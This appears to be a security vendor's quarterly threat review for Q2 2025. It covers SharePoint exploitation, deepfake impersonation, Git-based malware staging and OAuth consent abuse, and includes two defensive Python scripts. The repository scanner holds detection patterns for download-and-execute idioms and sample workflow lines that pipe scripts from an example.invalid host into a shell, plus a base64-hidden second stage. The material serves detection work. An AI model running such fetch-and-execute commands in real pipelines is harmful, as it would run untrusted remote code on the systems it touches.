
Q2 2025 in review: nation-state tactics, trusted tools abused, and zero-day fatigue sets in

01 July 2025

Quarterly Review

Q2 2025 brought a mix of stealthy nation-state operations, increasingly abused trusted platforms, and multiple critical vulnerabilities—many of which hit defenders before they hit the news. While some trends from Q1 continued (e.g., Git repo abuse and API exploitation), others escalated with sharper precision and geopolitical overtones.

From global frameworks being bypassed to vendor ecosystems being silently co-opted, Q2 was a quarter of subtle breaches with high-consequence impact.

1. Microsoft SharePoint exploit weaponized at scale

Date of escalation: April 2, 2025

Following the Q1 disclosure of CVE-2025-21517, exploitation scaled in early April. Multiple confirmed incidents affected public sector networks and critical infrastructure operators using hybrid SharePoint setups.

While patches were available, many systems remained vulnerable due to overlooked internal deployments.

Notably, several attacks left no trace of traditional lateral movement in logs; instead, they chained SharePoint-to-Azure sync misconfigurations to reach other systems.

2. AI-powered deepfakes used in real-time corporate impersonation attacks

Date reported: April 17, 2025

Security agencies issued coordinated warnings after multiple victims fell for real-time video impersonations of CFOs and CISOs, with threat actors using AI to simulate executive presence on Zoom and Teams.

In at least two cases, wire transfers over $400K were approved after calls with cloned avatars.

The FBI, ENISA, and JPCERT issued bulletins urging organizations to validate voice/video requests using separate channels.

3. GitHub and GitLab abused for staged malware delivery

Ongoing escalation: April–June 2025

Building on Q1’s trend, multiple attackers embedded payloads in Git repositories and leveraged legitimate CI/CD tools to execute staged infections.

The twist this quarter: payloads were encoded into markdown files, changelogs, and even GitHub Actions workflows.

The trusted tooling attack surface is now broader than ever—especially for dev-centric organizations.
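The following scanner is an added example (not code from Cyber Protocol or from any project named above) of how a defender can look for the two patterns just described: workflow steps that fetch or decode a second stage at build time, and long base64 runs hidden in markdown or changelog text that decode to something executable. The rules are textual heuristics rather than a YAML parser, and the sample repository files, including the `example.invalid` URLs and the hidden script, are constructed for the demonstration.

```python
"""
Heuristic scanner for staged-payload indicators in a Git repository.

Added example, not code from Cyber Protocol or any project named above.
Two checks: (1) GitHub Actions workflow files are searched for shell idioms
that fetch or decode a second stage at build time; (2) every file is
searched for long base64 runs that decode to something executable-looking,
the pattern described for markdown and changelog files. The rules are
textual heuristics, not a YAML parser, and all sample files are constructed
inline so the script runs offline.
"""
import base64
import os
import re
from typing import Dict, List

# Shell idioms in a workflow `run:` step that pull or unpack a second stage.
STAGE_RULES = [
    ("remote-pipe-to-shell",
     re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|z|da)?sh\b", re.I)),
    ("inline-base64-decode",
     re.compile(r"\bbase64\s+(-d|--decode)\b", re.I)),
    ("encoded-powershell",
     re.compile(r"\bpowershell(\.exe)?\b.*\s-e(c|nc|ncodedcommand)\b", re.I)),
    ("eval-of-subshell",
     re.compile(r'\beval\s+"?\$\(', re.I)),
]

# A run of 64+ base64 characters is long enough to hide a script; shorter
# runs (hashes, tokens) are ignored to keep noise down.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# Markers that make a decoded blob worth a human look.
PAYLOAD_PREFIXES = (b"#!", b"MZ", b"\x7fELF")
PAYLOAD_WORDS = (b"powershell", b"curl ", b"wget ", b"/bin/sh")


def decoded_payload(blob: str):
    """Return decoded bytes if `blob` is valid base64 that looks executable, else None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if raw.startswith(PAYLOAD_PREFIXES) or any(w in raw for w in PAYLOAD_WORDS):
        return raw
    return None


def is_workflow(path: str) -> bool:
    return path.startswith(".github/workflows/") and path.endswith((".yml", ".yaml"))


def scan_files(files: Dict[str, str]) -> List[dict]:
    """Scan {repo-relative path: text} and return one finding dict per hit."""
    findings = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            if is_workflow(path):
                for rule, rx in STAGE_RULES:
                    if rx.search(line):
                        findings.append({"path": path, "line": lineno,
                                         "rule": rule, "snippet": line.strip()})
            for m in B64_BLOB.finditer(line):
                if decoded_payload(m.group(0)) is not None:
                    findings.append({"path": path, "line": lineno,
                                     "rule": "embedded-base64-payload",
                                     "snippet": m.group(0)[:32] + "..."})
    return findings


def scan_repo(root: str) -> List[dict]:
    """Walk a checked-out repository and scan every text file (skipping .git)."""
    files = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "r", encoding="utf-8", errors="ignore") as fh:
                files[rel] = fh.read()
    return scan_files(files)


# Constructed sample repository: one clean workflow, one that stages a
# payload, and a changelog whose HTML comment hides a base64-encoded script.
SECOND_STAGE = b"#!/bin/sh\ncurl -s http://example.invalid/stage2 | sh\n"
SECOND_STAGE_B64 = base64.b64encode(SECOND_STAGE).decode()
SAMPLE_FILES = {
    ".github/workflows/ci.yml": (
        "name: ci\non: [push]\njobs:\n  test:\n    runs-on: ubuntu-latest\n"
        "    steps:\n      - uses: actions/checkout@v4\n"
        "      - run: npm ci && npm test\n"),
    ".github/workflows/release.yml": (
        "name: release\non: [push]\njobs:\n  build:\n    runs-on: ubuntu-latest\n"
        "    steps:\n"
        "      - run: curl -fsSL http://example.invalid/setup.sh | bash\n"
        "      - run: echo \"$CFG\" | base64 -d > /tmp/cfg && sh /tmp/cfg\n"),
    "CHANGELOG.md": "## 1.4.2\n- Fixed build cache.\n<!-- build-id " + SECOND_STAGE_B64 + " -->\n",
    "README.md": "# demo\nRun `make test`.\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['path']}:{f['line']} [{f['rule']}] {f['snippet']}")
```

Running the script against the constructed sample reports the two staging steps in `release.yml` and the hidden script in `CHANGELOG.md`, and nothing for the clean workflow or README. Point `scan_repo()` at a checkout to run it on a real repository; the shell rules are deliberately restricted to workflow files because `curl | sh` install one-liners are common in READMEs and would drown the signal.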

4. Pay2Key-linked espionage campaigns expand to Asia-Pacific

Wave detected: May 2025

Following their Q1 reappearance, the Iranian-linked Pay2Key group expanded its footprint into Singapore, Hong Kong, and Seoul.

Rather than encrypting files, their malware focused on credential theft, exfiltration of SharePoint content, and Active Directory mapping.

Cyber Protocol threat teams observed no ransom notes—just quiet persistence.

Indicators of compromise were shared across private intel sharing circles by mid-May.

5. New exploitation chain targets OAuth misconfigurations

First observed: June 12, 2025

Researchers disclosed a multi-step attack chain allowing attackers to abuse OAuth token scopes in Microsoft 365, Okta, and GitHub Enterprise.

Once initial access was gained, silent consent grant escalation enabled access to email, SharePoint, and Teams data—without triggering login alerts.

This highlights the growing risk of token-based trust models without proper revocation hygiene.
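The audit below is an added example, not code from Cyber Protocol or from any of the vendors named above, of the revocation and consent hygiene this section calls for. It runs three checks over consent grants: an app outside the reviewed list holding high-impact scopes, an approved app whose grant has quietly grown past its reviewed baseline (the consent escalation pattern), and an `offline_access` grant older than the re-consent age, which still mints access tokens without any new login. The grant records, app names and scope sets are constructed; their fields mirror the shape of a Microsoft Graph `oauth2PermissionGrant` as an assumption, so a real run would feed exported grants from the identity provider instead.

```python
"""
Audit OAuth consent grants for silent scope growth and stale refresh access.

Added example, not Cyber Protocol code. The grant records are constructed
inline; their fields (client_id, consent_type, principal_id, space-separated
scope) mirror the shape of a Microsoft Graph oauth2PermissionGrant as an
assumption, so a real run would feed exported grants from the identity
provider. Three checks: an app outside the approved list holding high-impact
scopes, an approved app whose grant exceeds its reviewed baseline (consent
escalation), and a long-lived offline_access grant past the re-consent age.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, Iterable, List, Set

# Delegated scopes that alone expose mail, files/SharePoint, Teams chat, or
# keep access alive via refresh tokens. Names are Microsoft Graph style.
HIGH_IMPACT_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send",
    "Files.Read.All", "Files.ReadWrite.All",
    "Sites.Read.All", "Sites.ReadWrite.All",
    "Chat.Read", "ChannelMessage.Read.All",
    "offline_access",
}


@dataclass
class Grant:
    client_id: str
    client_name: str
    consent_type: str      # "AllPrincipals" (admin, tenant-wide) or "Principal" (one user)
    principal_id: str      # user object id, or "" for tenant-wide grants
    scope: str             # space-separated, as the IdP returns it
    granted_at: datetime

    def scopes(self) -> Set[str]:
        return set(self.scope.split())


def _finding(g: Grant, rule: str, scopes: Set[str]) -> dict:
    return {"client": g.client_name, "principal": g.principal_id or "*",
            "consent_type": g.consent_type, "rule": rule, "scopes": sorted(scopes)}


def audit(grants: Iterable[Grant], approved: Dict[str, Set[str]],
          now: datetime, max_age_days: int = 90) -> List[dict]:
    """Return findings for every grant that violates the consent policy.

    `approved` maps client_id -> the scope set reviewed for that app.
    """
    findings = []
    for g in grants:
        scopes = g.scopes()
        baseline = approved.get(g.client_id)
        if baseline is None:
            high = scopes & HIGH_IMPACT_SCOPES
            if high:
                findings.append(_finding(g, "unapproved-app", high))
        else:
            extra = scopes - baseline
            if extra:
                findings.append(_finding(g, "scope-creep", extra))
        # offline_access yields refresh tokens; without periodic revocation a
        # grant from months ago still mints fresh access tokens silently.
        if "offline_access" in scopes and now - g.granted_at > timedelta(days=max_age_days):
            findings.append(_finding(g, "stale-refresh-grant", {"offline_access"}))
    return findings


# Constructed sample data, evaluated at a fixed point in time.
NOW = datetime(2025, 6, 30, tzinfo=timezone.utc)
APPROVED = {"app-mailsync": {"Mail.Read", "offline_access"}}
SAMPLE_GRANTS = [
    Grant("app-mailsync", "Contoso Mail Sync", "AllPrincipals", "",
          "Mail.Read offline_access", NOW - timedelta(days=10)),
    # Same app, one user's grant later widened to write mail and all files.
    Grant("app-mailsync", "Contoso Mail Sync", "Principal", "user-17",
          "Mail.Read Mail.ReadWrite Files.ReadWrite.All offline_access",
          NOW - timedelta(days=5)),
    # Unreviewed app with broad read scopes, granted 200 days ago.
    Grant("app-pdfhelper", "PDF Helper", "Principal", "user-42",
          "Files.Read.All Sites.Read.All offline_access", NOW - timedelta(days=200)),
    # Unreviewed but low impact: no finding, so triage focuses on data access.
    Grant("app-calwidget", "Calendar Widget", "Principal", "user-42",
          "User.Read", NOW - timedelta(days=1)),
]

if __name__ == "__main__":
    for f in audit(SAMPLE_GRANTS, APPROVED, NOW):
        print(f"[{f['rule']}] {f['client']} principal={f['principal']} {f['scopes']}")
```

The second grant is the one this section warns about: the app is approved and the user logged in legitimately, so nothing in the sign-in log changes, yet the grant now carries `Mail.ReadWrite` and `Files.ReadWrite.All`. Comparing each grant against a reviewed baseline, rather than only checking whether the app is known, is what surfaces it; the age check on `offline_access` is the revocation hygiene the text refers to.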

Trends worth tracking

  • Deepfakes are operational. These are no longer “future risks”—they’re being used today for financial fraud and credential harvesting.
  • Version-controlled malware is real. Git-based trust assumptions must be revisited entirely.
  • Post-authentication abuse is the new norm. Most Q2 attacks began with a legitimate login—and escalated from there.
  • Security fatigue is spreading. With a near-weekly wave of patches, many orgs are prioritizing speed over discipline—and attackers are noticing.

Final word

If Q1 was the warning shot, Q2 was confirmation:

The tools you trust—identity platforms, version control, collaboration software—are now attack surfaces.
And the faces you think you recognize? Those may not be real either.